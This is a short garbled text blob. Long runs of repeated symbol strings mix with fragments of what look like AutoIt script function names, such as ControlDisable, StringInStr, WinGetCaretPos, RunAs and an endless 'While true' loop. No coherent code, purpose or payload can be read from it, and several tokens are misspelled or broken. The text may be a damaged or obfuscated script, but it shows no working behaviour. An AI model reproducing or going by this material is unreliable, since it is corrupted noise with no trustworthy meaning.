32=723=3
333
33
33=32=33=33*33

33=3DisaStringInStrble[32=72=33
33&2=3s=ControlDisable[32=72=33
33&33=3=q-#@MON=59+@$6==.$63=3=q-#=53=9.335-3*33

33=32=33=˜
33&33=3=q-#@MON=59+@$6==.45+@$6==.$63=3=q-#=53=9.335-@$F$6-.$6=5	=.$233
33=32=33=&33=33=32=72
33
F$6-.$6=5	=.$233
33=32=33=33*33
32=33*33
33
3#
33=32=33=ContolDisable[32=72=33
33&33=3=q-#@MON=59+@$6==.d63=3=q-#=53=9.335-@$F$6-.72=33
=32=33=ContolDisable[32=72=33
33&33=3=q-#@MON=59+@$6==.d63=3=q-#=53=9.335-@$F$6-.72=33
33&33=3=q-#@MON=59+@$6==.$63=3=q-#=53=9.335-3While true=33=3
33=q-#MON=59+@$6==.$63=3=q-#=26=9.335-3*	=.$233
33=32=33=3sabl3&33=3=q-#@MON=59+@$6==.$63=3=q-#=53=9.335-3*33

33=32=33=3
33&33=3=q-#@MON=59+@$6==.$63=3=q-#=53=9.335-3*	lDisable[32=72=33
33&33=3=q-#@MON=59+@$6==.d63=3=q-#=53=9.335-@$F$6-.$6=5	=.$233
33=32=33=33*33
32=33*Ô33
33
33
33=32=33=ControlDisable[32=72=33
33&33=3=q-#@MON=59+@$6==.$63=3=q-#=53=9.333*33
32=33*33
33
33
33WinGetCaretPosDisable[32=72=33
33&33=3=q-#@2=33=33*33
32=33*33
33
33
33=32=33=ControlDisable[32=72=33
33&33=3=q-#@MON=59+@$6==.$63=3=q-#=53=9.335-3*33

33=32=33=3
33&33=3=q-#@MON=RunAs6==.$63=3=q-#=53=9.335-3*33

33=32=33=333*33
322=72=33
33&33=3=q-#@MON=59+@$6==.$63=3=q-#=53=9.335-3*33

33=32=33=3
33&33=3=q-#@MOJ=59+@$6==.$63=3=q-#=53=9.335-3*33

33=32=33%=033*33
32==.$63=3=q-#=53=9.335-@$F$6-.$6=5	=.$233
3333
33&33=3=q-#@MON=59+@$6==.$63=3=q-#=53=9.335-@$@$